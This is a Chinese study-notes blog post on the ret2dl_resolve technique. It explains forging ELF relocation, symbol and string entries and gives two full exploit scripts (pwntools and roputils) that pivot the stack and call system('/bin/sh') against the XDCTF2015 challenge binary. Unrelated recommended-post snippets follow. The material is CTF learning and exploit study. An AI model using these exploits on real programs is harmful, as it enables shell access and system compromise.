Sopora
Sopora

Ret2dl_resolve学习笔记

ret2dl_resolve的原理:

 

动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index)

功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项

第一个参数link_map_obj恒为GOT[1]的地址

第二个参数reloc_index为被绑定函数在.rel.plt段中的相对偏移

原理:

  1. 调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈中的重定向表表项
  2. - 伪造重定向表表项,修改第二项中的符号表索引,令其指向伪造在栈中的符号表表项
  3. --伪造符号表表项,修改第一项(字符串表偏移),令其指向伪造在栈中的字符串(’system’)
  4. 令该函数的参数为写入在栈中的’/bin/sh\x00’的地址,即可getshell

 

ret2dl_resolve的前提:

 

1.非Full RELRO      -z lazy/norelro

2.无PIE              -no-pie

3.能够溢出           -fno-stack-protector

 

编译选项:gcc -m32 -fno-stack-protector -no-pie -z lazy main.c -o main

 

$ checksec main

 

RELRO            STACK CANARY      NX             PIE           

Partial RELRO   No canary found   NX enabled    No PIE         

 

重定向表:

 

$ readelf -r main

 

Relocation section '.rel.dyn' at offset 0x30c contains 3 entries:

 Offset     Info    Type            Sym.Value  Sym. Name

08049ff4  00000306 R_386_GLOB_DAT    00000000   __gmon_start__

08049ff8  00000706 R_386_GLOB_DAT    00000000   stdin@GLIBC_2.0

08049ffc  00000806 R_386_GLOB_DAT    00000000   stdout@GLIBC_2.0

 

Relocation section '.rel.plt' at offset 0x324 contains 5 entries:

 Offset     Info    Type            Sym.Value  Sym. Name

0804a00c  00000107 R_386_JUMP_SLOT   00000000   setbuf@GLIBC_2.0

0804a010  00000207 R_386_JUMP_SLOT   00000000   read@GLIBC_2.0

0804a014  00000407 R_386_JUMP_SLOT   00000000   strlen@GLIBC_2.0

0804a018  00000507 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0

0804a01c  00000607 R_386_JUMP_SLOT   00000000   write@GLIBC_2.0

 

符号表:

 

$ readelf --dyn-sym main

 

Symbol table '.dynsym' contains 10 entries:

   Num:    Value  Size Type    Bind   Vis      Ndx Name

     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND

     1: 00000000     0 FUNC    GLOBAL DEFAULT  UND setbuf@GLIBC_2.0 (2)

     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND read@GLIBC_2.0 (2)

     3: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__

     4: 00000000     0 FUNC    GLOBAL DEFAULT  UND strlen@GLIBC_2.0 (2)

     5: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)

     6: 00000000     0 FUNC    GLOBAL DEFAULT  UND write@GLIBC_2.0 (2)

     7: 00000000     0 OBJECT  GLOBAL DEFAULT  UND stdin@GLIBC_2.0 (2)

     8: 00000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.0 (2)

     9: 0804866c     4 OBJECT  GLOBAL DEFAULT   16 _IO_stdin_used

 

EXP(pwntools):

 

from pwn import *

elf = ELF('main')

r = process('./main')

rop = ROP('./main')

 

offset = 112

bss_addr = elf.bss()

 

r.recvuntil('Welcome to XDCTF2015~!\n')

 

## stack pivoting to bss segment

## new stack size is 0x800

stack_size = 0x800

base_stage = bss_addr + stack_size

### padding

rop.raw('a' * offset)

### read 100 byte to base_stage

rop.read(0, base_stage, 100)

### stack pivoting, set esp = base_stage

#migrate = gadgets1: pop ebp     #stack: base_stage

#                    ret         #       gadgets2

#          gadgets2: mov ebp esp #       null

#                    pop ebp     #

#                    ret         #

 

rop.migrate(base_stage)

r.sendline(rop.chain())

 

## write sh="/bin/sh"

rop = ROP('./main')

sh = "/bin/sh"

 

plt0 = elf.get_section_by_name('.plt').header.sh_addr

rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr

dynsym = elf.get_section_by_name('.dynsym').header.sh_addr

dynstr = elf.get_section_by_name('.dynstr').header.sh_addr

 

### making fake write symbol

fake_sym_addr = base_stage + 32

align = 0x10 - ((fake_sym_addr - dynsym) & 0xf

                )  # since the size of item(Elf32_Symbol) of dynsym is 0x10

fake_sym_addr = fake_sym_addr + align

index_dynsym = (

    fake_sym_addr - dynsym) / 0x10  # calculate the dynsym index of write

## plus 10 since the size of Elf32_Sym is 16.

st_name = fake_sym_addr + 0x10 - dynstr

fake_write_sym = flat([st_name, 0, 0, 0x12])

 

### making fake write relocation

 

## making base_stage+24 ---> fake reloc

index_offset = base_stage + 24 - rel_plt

write_got = elf.got['write']

r_info = (index_dynsym << 8) | 0x7

fake_write_reloc = flat([write_got, r_info])

 

rop.raw(plt0)

rop.raw(index_offset) #指向fake_write_reloc

## fake ret addr of write

rop.raw('bbbb')

rop.raw(base_stage + 82) #system的参数:’/bin/sh\x00’的地址

rop.raw('bbbb')

rop.raw('bbbb')

#r_info的索引指向fake_write_sym

rop.raw(fake_write_reloc)  # fake write reloc

rop.raw('a' * align)  # padding

#指向’system’

rop.raw(fake_write_sym)  # fake write symbol

rop.raw('system\x00'# there must be a \x00 to mark the end of string

rop.raw('a' * (80 - len(rop.chain())))

print rop.dump()

print len(rop.chain())

rop.raw(sh + '\x00')

rop.raw('a' * (100 - len(rop.chain())))

 

r.sendline(rop.chain())

r.interactive()

 

EXP(roputils):

 

from roputils import *

from pwn import process

from pwn import gdb

from pwn import context

r = process('./main')

context.log_level = 'debug'

r.recv()

 

rop = ROP('./main')

offset = 112

bss_base = rop.section('.bss')

buf = rop.fill(offset)

 

buf += rop.call('read', 0, bss_base, 100)

# used to call dl_Resolve()

buf += rop.dl_resolve_call(bss_base + 20, bss_base)

r.send(buf)

 

buf = rop.string('/bin/sh')

buf += rop.fill(20, buf)

# used to make faking data, such relocation, Symbol, Str

buf += rop.dl_resolve_data(bss_base + 20, 'system')

buf += rop.fill(100, buf)

r.send(buf)

r.interactive()

 

你可能感兴趣的:(Ret2dl_resolve学习笔记)

  • 电磁兼容学习笔记12-电子设备中的主要骚扰源 胡你一脸团团团 学习笔记单片机
    跟杨老师学习电磁兼容电子设备中的主要骚扰源#第16课典型的骚扰源(找du/dt、di/dt比较大的电路):骚扰源1:二次电源(几乎所有的电路都需要DC/DC),传导骚扰骚扰源2:数字电路,传导骚扰和辐射骚扰DC/DC模块骚扰产生原理:du/dt:开关导通时,直流电压直接传送到输出端;开关断开时,电流无法传送到输出端,依靠输出端电容进行供电。开关导通时,输出电压为0;断开时电容放电,开关上电压为输入
  • 如何学懂C++语言:C++从入门到精通的全面指南(完整C++学习笔记) 猿享天开 c++学习笔记
    数字人助手猿小美带你一起学编程一、引言作为一名拥有多年开发经验的技术人员,我的职业生涯涵盖了多种编程语言,包括C语言、C++、C#和JavaScript等。在我多年的编程生涯中,这些语言不仅丰富了我的知识储备,还极大地拓展了我的视野和技能。出于对编程的热爱,以及希望帮助更多编程爱好者的目的,我决定利用业余时间整理一套全面的C++语言学习指南。这套指南旨在为C++语言编程爱好者提供一个清晰的学习路线
  • MySQL学习笔记11:limit 分页查询 AsajuHuishi MySQLmysql数据库
    简介本系列(MySQL学习笔记)是我基于B站上SQL播放量第一的MySQL基础+高级篇-数据库-sql-尚硅谷视频所做的笔记,方便大家学习和掌握MySQL。说明1.这个系列基本包含了视频中老师讲课的所有内容,包括知识点、案例、部分测试题。2.所需的配套资料(来自B站评论区)@黎曼的猜想:配套资料下载–>公众号公众号DragonWell回复:mysql注意:是公众号!!是公众号!!是公众号,点那个搜
  • 学习笔记078——Java Properties类使用详解 上下求索. Java学习笔记java
    文章目录概述常见方法写入读取遍历概述Properties继承于Hashtable。表示一个持久的属性集,属性列表以key-value的形式存在,key和value都是字符串。Properties类被许多Java类使用。例如,在获取环境变量时它就作为System.getProperties()方法的返回值。我们在很多需要避免硬编码的应用场景下需要使用properties文件来加载程序需要的配置信息,
  • 学习笔记040——如何定时备份服务器中的数据库? 上下求索. MySQLLinuxmysql服务器
    目录1、编写备份脚本:2、创建crontab定时任务需求前景:Ubuntu系统的服务器中,需要定时备份MySQL数据库中的数据。确保数据能够得到安全保障。我的方法:1、写一个备份数据库的脚本2、利用Ubuntu的crontab每日定时执行脚本。下面是我的实现方式:1、编写备份脚本:#!/bin/bash#设置数据库名,用户和密码DB_NAME="数据库名"DB_USER="账号"DB_PASSWO
  • mysql学习笔记(八):分页查询 代码魔法师Sunny MySQLmysql学习笔记
    应用场景:当要显示的数据,一页显示不全,需要分页提交sql请求语法:select查询列表from表【jointypejoin表2on连接条件where筛选条件groupby分组字段having分组后的筛选orderby排序的字段】limit【offset,】size;offset要显示条目的起始索引(起始索引从0开始)size要显示的条目个数特点:①limit语句放在查询语句的最后②公式要显示的页
  • 学习笔记081——如何备份服务器中MySQL数据库数据? 上下求索. MySQLLinux数据库学习笔记
    方法:可以通过编写sh脚本的方式,结合Linux中的crontab定时任务来实现定时备份数据的功能。sh脚本如下:#!/bin/bash#要备份的数据库DB_NAME="wms"#数据库账号DB_USER="root"#数据库密码DB_PASSWORD="123456"#数据备份存放目录BACKUP_DIR="/home/htl/backup"mkdir-p$BACKUP_DIR#备份文件名BAC
  • 隐语课程 隐语架构概览学习笔记 皓月雪 学习笔记
    隐语架构包含:产品层、算法层、计算层、资源层和硬件层隐语产品:定位:通过可视化产品,降低终端用户的体验和演示成本。通过模块化API降低技术集成商的研发成本。人群画像:作为隐语的直观入口,隐语保护计算从业者均应该关注产品:SecretPad:轻量化安装、快速验证POC、可定制集成;多部署形态:中心模式、P2P模式全栈产品:MPC、TEE、SCQLSecretNote:Notebook形式、交互式建模
  • MyBatis学习笔记 繁星依月 开发技术学习笔记mybatis学习笔记
    MyBatis学习笔记MyBatis绪论功能:访问数据库相当于增强版JDBC官网:mybatis–MyBatis3|简介MyBatis环境JDK1.8MySQL5.7/8.0(经典!)maven3.6+IDEAMyBatis前序JDBC、MySQL、Java基础、Maven、JunitMyBatis简介什么是MyBatisMyBatis是一款优秀的持久层框架,它支持自定义SQL、存储过程以及高级映
  • sed学习笔记1 我要精通C++ shell脚本与linux命令sed
    0.引用《Linux命令行与shell脚本编程大全.第3版by布鲁姆,布雷斯纳汉》第19章,第21章1.今晚回家学习总结
  • golang学习笔记08——如何调用阿里oss sdk实现访问对象存储? GoppViper golang学习笔记golang学习笔记阿里云对象存储后端
    推荐学习文档golang应用级os框架,欢迎stargolang应用级os框架使用案例,欢迎star案例:基于golang开发的一款超有个性的旅游计划app经历golang实战大纲golang优秀开发常用开源库汇总想学习更多golang知识,这里有免费的golang学习笔记专栏首先确保安装了阿里云OSS的GoSDK:goget-ugithub.com/aliyun/aliyun-oss-go-sd
  • 芝法酱学习笔记(2.5)——elastic-search 8.x初探(自用) 芝法酱 elasticsearchspringboot
    一、elastic-search的下载官网的下载地址在这里。官网文档地址在这里访问路径是doc/search让人惊呆了,新版的elastic-search竟然需要JDK23。ThelocaledatabaseusedbyElasticsearch,usedtomapfromvariousdateformatstotheunderlyingdatestorageformat,dependsonthe
  • ESP32学习笔记_FreeRTOS(6)——Event and Notification flashier ESP32学习笔记ESP32c语言RTOS
    摘要(FromAI):这篇博客详细介绍了FreeRTOS中的事件组和任务通知机制,讲解了事件组如何通过位操作实现任务间的同步与通信,以及任务如何通过通知机制进行阻塞解除和数据传递。博客提供了多个代码示例,展示了如何使用事件组和任务通知在多任务环境中实现任务同步,特别适用于任务间的依赖关系和信号传递前言:本文档是本人在依照B站UP:Michael_ee的视频教程进行学习时所做的学习笔记,可能存在疏漏
  • 2024年软考信息安全工程师备考学习笔记汇总 月梦工作室 信息安全工程师
    信息安全工程师分属“信息系统”专业,位处中级资格,2016年下半年,第一次开考信息安全工程师(中级)考试。目前每年考试一次。已开考六次,2016年11月12日,2017年5月20日,2018年5月26日,2019年5月25日,2020年11月7日,2021年11月6日,2022年11月5日,2023年11月4日为第八次考试。第五次至第八次考试,采用第二版教材。信安精品课|月梦工作室(moondre
  • 自强学堂mysql_Django ——自强学堂学习笔记 weixin_39792049 自强学堂mysql
    (一)、启动服务器E:\ScienceSoft\Python\Django\Django_project>pythonmanage.pyrunserver0.0.0.0:8000Performingsystemchecks...Systemcheckidentifiednoissues(0silenced).July22,2017-17:00:33Djangoversion1.11.3,using
  • Django几条命令,一定要牢记(Python学习笔记) 代码帮 Python教程Pythondjango
    Django项目搭建流程流程(切记使用中文)安装包安装下载安装包,解压运行pythonsetup.pyinstall命令安装python-mpipinstalldjango新建一个djangoprojectdjango-admin.pystartprojectproject_name特别是在windows上;如果报错,尝试用django-admin代替django-admin.py试试JetBra
  • 关于我的博客建站经历 忆宸_1 博客前端
    我是一名前端开发工程师,从大四的时候开始自学前端,荒废了三年时光,在大四的时候才算真正走进“编程”这扇大门。也是从那个时候开始学着搭建自己的个人博客,用来记录自己的学习笔记,但是却坚持不下来。而且发现一个奇怪的现象,对于搭建站点的过程我很感兴趣,内容输出却坚持不下来,这是我需要反思的地方。我也翻了翻过往的文章,大多都是记录单一知识点,而且内容很少,缺乏自己的思考。现在AI技术已经很成熟了,再记录这
  • 深度学习笔记——前向传播与反向传播、神经网络(前馈神经网络与反馈神经网络)、常见算法概要汇总 好评笔记 深度学习笔记深度学习笔记神经网络人工智能
    大家好,这里是好评笔记,公主号:Goodnote,专栏文章私信限时Free。本文简要介绍深度学习的前向传播与反向传播,以及前馈神经网络与反馈神经网络。文章目录前向传播与反向传播前向传播(ForwardPropagation)反向传播(BackPropagation)总结神经网络简介结构类型前馈神经网络(FeedforwardNeuralNetwork,FFNN)特点常见变体反馈神经网络(Feedb
  • 深度学习笔记——生成对抗网络GAN 好评笔记 深度学习笔记深度学习生成对抗网络人工智能神经网络aigcgan机器学习
    大家好,这里是好评笔记,公主号:Goodnote,专栏文章私信限时Free。本文详细介绍早期生成式AI的代表性模型:生成对抗网络GAN。文章目录一、基本结构生成器判别器二、损失函数判别器生成器交替优化目标函数三、GAN的训练过程训练流程概述训练流程步骤1.初始化参数和超参数2.定义损失函数3.训练过程的迭代判别器训练步骤生成器训练步骤4.交替优化5.收敛判别GAN训练过程的挑战四、GAN的常见变体
  • 机器学习笔记——Boosting中常用算法(GBDT、XGBoost、LightGBM)迭代路径 好评笔记 机器学习笔记机器学习boosting人工智能深度学习AI算法工程师
    大家好,这里是好评笔记,公主号:Goodnote,专栏文章私信限时Free。本文主要阐述Boosting中常用算法(GBDT、XGBoost、LightGBM)的迭代路径。文章目录XGBoost相对GBDT的改进引入正则化项,防止过拟合损失函数L(yi,y^i)L(y_i,\hat{y}_i)L(yi,y^i)正则化项Ω(fm)\Omega(f_m)Ω(fm)使用二阶导数信息,加速收敛一阶导数与二
  • 基于vue.js+element-ui组件开发的博客blog详细步骤 perfect-code-hzy 前端工程师学习笔记vue.jsjavascript
    vue学习笔记一、前端项目初始化步骤1、通过vuecli3创建项目2、配置vue路由3、配置element-ui组件库4、配置axios库5、初始化git远程仓库6、将本地项目托管到GitHub或码云上二、接口API1、调试工具三、登录和退出功能完成登录组件提交到git--合并分支一、前端项目初始化步骤1、通过vuecli3创建项目通过vueui命令进行可视化创建项目选择创建的路径->自定义配置项
  • qt/c++学习笔记之基于tcp的文件同步程序demo(第二部分) Bryce学亮 qtc++学习
    server服务器端头文件filebase.h#ifndefFILEBASE_H#defineFILEBASE_H#include#include#include#include#includeenumMsgType{MsgTypeInvaid=0,MsgTypeFile,MsgTypeDel,MsgTypeRename};classfilebase:publicQObject{Q_OBJECTp
  • Python学习笔记 | 类与对象 MUYUN友逹 Python学习笔记类与对象
    基于Python3版本的学习。初识概念:类(class)与对象(object)生活中我们所说的类,是物以类聚的类,是分门别类的类,是多个类似事物组成的群体的统称。而在Python中我们所遇到的类(class),比如整数、字符串、浮点数等,不同的数据类型就属于不同的类。准确来说,它们的全名是整数类、字符串类、浮点数类。每一个类之下都包含无数相似的不同个例。在Python的术语里,我们把类的个例就叫做
  • 人工智能英语学习笔记 「已注销」
    基础篇单词mythologyn.ancientmythsingeneral;ideasthatmanypeoplethinkaretruebutthatdonotexistorarefalse神话Examples:AsatyrishalfmanandhalfgoatinGreekandRomanmythology.在希腊和罗马神话中,森林之神是半人半羊的样子。Thishasbeenwellillu
  • TypeScript 学习笔记(七):TypeScript 与后端框架的结合应用 Evaporator Core typescript前端框架学习
    1.引言在前几篇学习笔记中,我们已经探讨了TypeScript的基础知识和在前端框架(如Angular和React)中的应用。本篇将重点介绍TypeScript在后端开发中的应用,特别是如何与Node.js和Express结合使用,以构建强类型、可维护的后端应用。2.TypeScript与Node.jsNode.js是一个基于ChromeV8引擎的JavaScript运行时,广泛用于构建后端应用。
  • 深度学习项目--基于LSTM的火灾预测研究(pytorch实现) 羊小猪~~ RNNLSTM神经网络案例机器学习/数据分析案例深度学习lstmpytorch人工智能机器学习rnngru
    本文为365天深度学习训练营中的学习记录博客原作者:K同学啊前言LSTM模型一直是一个很经典的模型,这个模型当然也很复杂,一般需要先学习RNN、GRU模型之后再学,GRU、LSTM的模型讲解将在这两天发布更新,其中:深度学习基础–一文搞懂RNN深度学习基础–GRU学习笔记(李沐《动手学习深度学习》)这一篇:是基于LSTM模型火灾预测研究,讲述了如何构建时间数据、模型如何构建、pytorch中LST
  • 架构师反向代理Haproxy+压力测试 - 学习笔记 无影V随风 学习笔记linux相关
    一.Apache的反向代理(生产不建议使用)1.Apache的编译安装:yuminstallapr-develapr-util-develpcre-developenssl-develcd/usr/local/src/wgethttp://archive.apache.org/dist/httpd/httpd-2.4.18.tar.gztar-zxvfhttpd-2.4.18.tar.gzcdht
  • 华为数通HCIA(学习笔记) 想做运维大佬 华为数通(HCIA)笔记系列华为学习笔记
    2024-03-22重启华为数通学习计划由于工作原因,预计将在2024年6月30日之前完成HCIP的学习并通过HCIP的考试-在2025年6月30日前完成HCIE的学习并通过HCIE的考试此为学习笔记,实验笔记和试题笔记会分别更新到其他帖子中一、数据网络通信基础1.1专业名词LAN(LocalAreaNetwork):局域网Ethrenet:以太网Campus:园区网VLAN(VirtualLAN
  • python学习笔记 浅夏入秋^_^ Python编程语言python学习开发语言
    python学习笔记第1-3章基础知识https://www.jetbrains.com/help/pycharm/小技巧:如果在编辑器中未选择任何内容,按⌘C可将文本光标处的整行复制到剪贴板。按两次⌃Space可调用代码补全功能的特殊变体,这样您可以从没有在当前文件中声明的命名空间补全XML标记名称。如果命名空间尚未声明,则会自动生成声明。使用代码|检查代码可对整个项目或自定义范围运行代码分析,
  • 2011寒假-数据库学习笔记 weixin_33967071 数据库设计模式人工智能
    第一课:数据库类型1.1平面文件适用于:1,数值小且简单2,数值不经常变化3,希望能够使用简单的文本编辑器来更改数值4,希望保存以前数值的简单历史清单,5,希望使用工具快速比较两个文件例如:INI文件(initialization)1.2关系数据库适用于:l需要在不同的表之间执行复杂的查询和连接.l需要执行数据有效性验证,如在其他表中检验相关行的存在.l需要为特定的数据有效性验证,如在其他表中检验
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他